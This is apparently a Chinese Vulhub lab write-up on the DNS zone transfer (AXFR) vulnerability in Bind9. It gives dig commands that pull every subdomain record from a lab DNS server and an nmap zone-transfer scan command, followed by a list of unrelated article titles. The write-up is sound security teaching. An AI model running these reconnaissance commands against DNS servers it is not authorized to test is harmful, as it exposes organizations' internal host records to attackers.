Vulhub 漏洞学习之：DNS

1 DNS域传送漏洞

DNS协议支持使用axfr类型的记录进行区域传送，用来解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源，将会导致DNS域传送漏洞。

参考链接：

• https://www.acunetix.com/blog/articles/dns-zone-transfers-axfr/
• https://nmap.org/nsedoc/scripts/dns-zone-transfer.html

1.1 漏洞利用过程

1. Vulhub使用Bind9来搭建dns服务器，但不代表只有Bind9支持AXFR记录。运行DNS服务器：环境运行后，将会监听TCP和UDP的53端口，DNS协议同时支持从这两个端口进行数据传输。

2. 在Linux下，我们可以使用dig命令来发送dns请求。比如，我们可以用dig @your-ip www.vulhub.org获取域名www.vulhub.org在目标dns服务器上的A记录：

   dig @192.168.210.13 www.vulhub.org
   
   # 192.168.210.13 为 docker DNS 服务器地址
   
   

   

3. 发送axfr类型的dns请求：

   # dig @your-ip -t axfr vulhub.org
   
   dig @192.168.210.13 -t axfr vulhub.org
   
   # 获取到了`vulhub.org`的所有子域名记录，这里存在DNS域传送漏洞。
   
   

   

4. 用nmap script来扫描该漏洞：

   # nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 your-ip
   
   nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 192.168.210.13
   
   

   

最新文章

1. Javascript实现HashTable类
2. 解决Eclipse建立Maven项目后无法建立src/main/java资源文件夹的办法
3. 【数据结构】红黑树 C语言代码
4. JAVA动态加载JAR包执行程序
5. ASP.NET MVC- 视图
6. 【js】js方法中直接跳转到servlet
7. Python核心编程笔记---- input 与raw_input
8. 虚拟机设置静态IP配置
9. Go语言的并发
10. 【Java】【13】两个double类型比较大小
11. Windows、Linux的环境变量
12. Kafka+Log4j2日志
13. 【378】python any() and all()
14. MYSQL判断不存在时创建表或创建数据库
15. webdriver+expected_conditions二次封装
16. 数据结构开发(14)：KMP 子串查找算法
17. python 中使用ConfigParser类修改配置文件
18. linux用户修改用户shell
19. 自定义HTTP头时的注意事项（转）
20. CentOS gitlab 安装配置

热门文章

1. 连表操作join 子查询 SQL补充 数据库软件navicat pymysql模块
2. loadrunner11汉化时提示模块插件无法注册的解决方法
3. 现代 CSS 高阶技巧，不规则边框解决方案
4. if-else 的优美写法
5. 英华学堂网课助手Linux版本
6. WCF 服务容器化的一些问题
7. Spring Boot 3.0横空出世，快来看看是不是该升级了
8. python连接kafka-2.0
9. 从0开始学习VUE3--01-Vue2与Vue3的不同点
10. Git入门图文教程(1.5W字40图)🔥🔥--深入浅出、图文并茂